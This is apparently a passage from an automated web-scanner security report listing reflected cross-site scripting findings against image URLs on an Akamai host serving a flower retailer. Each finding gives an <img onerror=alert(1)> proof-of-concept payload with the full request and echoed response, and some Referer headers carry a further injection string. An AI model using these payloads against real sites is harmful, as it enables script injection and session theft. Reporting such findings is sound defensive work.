Location: http://ad.yieldmanager.com/pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=596291&id=1044587&id=1049772&id=1063911&id=1063910&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:04:19 GMT


4. Cross-site scripting (reflected)
There are 212 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1fc4e<img%20src%3da%20onerror%3dalert(1)>27c92c8ec6c was submitted in the REST URL parameter 9. This input was echoed as 1fc4e<img src=a onerror=alert(1)>27c92c8ec6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn1fc4e<img%20src%3da%20onerror%3dalert(1)>27c92c8ec6c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Mon, 09 May 2011 12:12:33 GMT
Connection: close

Unable to find /ProvideCommerce/8inwoodtaper_tn1fc4e<img src=a onerror=alert(1)>27c92c8ec6c

4.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e86fb<img%20src%3da%20onerror%3dalert(1)>9d7791613a7 was submitted in the REST URL parameter 9. This input was echoed as e86fb<img src=a onerror=alert(1)>9d7791613a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tne86fb<img%20src%3da%20onerror%3dalert(1)>9d7791613a7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:12:32 GMT
Connection: close

Unable to find /ProvideCommerce/8inwvnbskt_tne86fb<img src=a onerror=alert(1)>9d7791613a7

4.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 532b2<img%20src%3da%20onerror%3dalert(1)>e8b79cc0d7f was submitted in the REST URL parameter 9. This input was echoed as 532b2<img src=a onerror=alert(1)>e8b79cc0d7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ532b2<img%20src%3da%20onerror%3dalert(1)>e8b79cc0d7f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:28 GMT
Connection: close

Unable to find /ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ532b2<img src=a onerror=alert(1)>e8b79cc0d7f

4.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dc0ce<img%20src%3da%20onerror%3dalert(1)>2e0a0929579 was submitted in the REST URL parameter 9. This input was echoed as dc0ce<img src=a onerror=alert(1)>2e0a0929579 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PFdc0ce<img%20src%3da%20onerror%3dalert(1)>2e0a0929579?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:14 GMT
Connection: close

Unable to find /ProvideCommerce/BBMflowers09_3months_PFdc0ce<img src=a onerror=alert(1)>2e0a0929579

4.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3cd85<img%20src%3da%20onerror%3dalert(1)>293739f3d19 was submitted in the REST URL parameter 9. This input was echoed as 3cd85<img src=a onerror=alert(1)>293739f3d19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF3cd85<img%20src%3da%20onerror%3dalert(1)>293739f3d19?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:14 GMT
Connection: close

Unable to find /ProvideCommerce/BBMflowers09_6months_PF3cd85<img src=a onerror=alert(1)>293739f3d19

4.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6e79d<img%20src%3da%20onerror%3dalert(1)>461165d53fe was submitted in the REST URL parameter 9. This input was echoed as 6e79d<img src=a onerror=alert(1)>461165d53fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF6e79d<img%20src%3da%20onerror%3dalert(1)>461165d53fe?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:17 GMT
Connection: close

Unable to find /ProvideCommerce/BBMflowers_12monthsXMAS_PF6e79d<img src=a onerror=alert(1)>461165d53fe

4.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 8c050<img%20src%3da%20onerror%3dalert(1)>d2aadd692a9 was submitted in the REST URL parameter 9. This input was echoed as 8c050<img src=a onerror=alert(1)>d2aadd692a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF8c050<img%20src%3da%20onerror%3dalert(1)>d2aadd692a9?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:04 GMT
Connection: close

Unable to find /ProvideCommerce/BBMplants09_12months_PF8c050<img src=a onerror=alert(1)>d2aadd692a9

4.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 219a4<img%20src%3da%20onerror%3dalert(1)>731292b4127 was submitted in the REST URL parameter 9. This input was echoed as 219a4<img src=a onerror=alert(1)>731292b4127 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF219a4<img%20src%3da%20onerror%3dalert(1)>731292b4127?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:08 GMT
Connection: close

Unable to find /ProvideCommerce/BBMplants09_3months_PF219a4<img src=a onerror=alert(1)>731292b4127

4.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 42d6c<img%20src%3da%20onerror%3dalert(1)>7a0481f0a6 was submitted in the REST URL parameter 9. This input was echoed as 42d6c<img src=a onerror=alert(1)>7a0481f0a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF42d6c<img%20src%3da%20onerror%3dalert(1)>7a0481f0a6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:07 GMT
Connection: close

Unable to find /ProvideCommerce/BBMplants09_6months_PF42d6c<img src=a onerror=alert(1)>7a0481f0a6

4.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload efcc5<img%20src%3da%20onerror%3dalert(1)>06385eca2 was submitted in the REST URL parameter 9. This input was echoed as efcc5<img src=a onerror=alert(1)>06385eca2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PFefcc5<img%20src%3da%20onerror%3dalert(1)>06385eca2?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:58 GMT
Connection: close

Unable to find /ProvideCommerce/BLB6indaffodills_nestbskt10_2_PFefcc5<img src=a onerror=alert(1)>06385eca2

4.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 98f67<img%20src%3da%20onerror%3dalert(1)>58f8ed190d0 was submitted in the REST URL parameter 9. This input was echoed as 98f67<img src=a onerror=alert(1)>58f8ed190d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF98f67<img%20src%3da%20onerror%3dalert(1)>58f8ed190d0?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:12 GMT
Connection: close

Unable to find /ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF98f67<img src=a onerror=alert(1)>58f8ed190d0

4.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7inhollmix_honeywvn09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7inhollmix_honeywvn09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 48187<img%20src%3da%20onerror%3dalert(1)>f3fd15c3de9 was submitted in the REST URL parameter 9. This input was echoed as 48187<img src=a onerror=alert(1)>f3fd15c3de9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7inhollmix_honeywvn09_PF48187<img%20src%3da%20onerror%3dalert(1)>f3fd15c3de9?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:57 GMT
Connection: close

Unable to find /ProvideCommerce/BLB7inhollmix_honeywvn09_PF48187<img src=a onerror=alert(1)>f3fd15c3de9

4.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 21185<img%20src%3da%20onerror%3dalert(1)>f2d54a66470 was submitted in the REST URL parameter 9. This input was echoed as 21185<img src=a onerror=alert(1)>f2d54a66470 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF21185<img%20src%3da%20onerror%3dalert(1)>f2d54a66470?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF21185<img src=a onerror=alert(1)>f2d54a66470

4.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 49976<img%20src%3da%20onerror%3dalert(1)>da2ce43ff53 was submitted in the REST URL parameter 9. This input was echoed as 49976<img src=a onerror=alert(1)>da2ce43ff53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF49976<img%20src%3da%20onerror%3dalert(1)>da2ce43ff53?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:53 GMT
Connection: close

Unable to find /ProvideCommerce/CAReaster_pnk10_PF49976<img src=a onerror=alert(1)>da2ce43ff53

4.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload da675<img%20src%3da%20onerror%3dalert(1)>a07aa15604a was submitted in the REST URL parameter 9. This input was echoed as da675<img src=a onerror=alert(1)>a07aa15604a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PFda675<img%20src%3da%20onerror%3dalert(1)>a07aa15604a?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
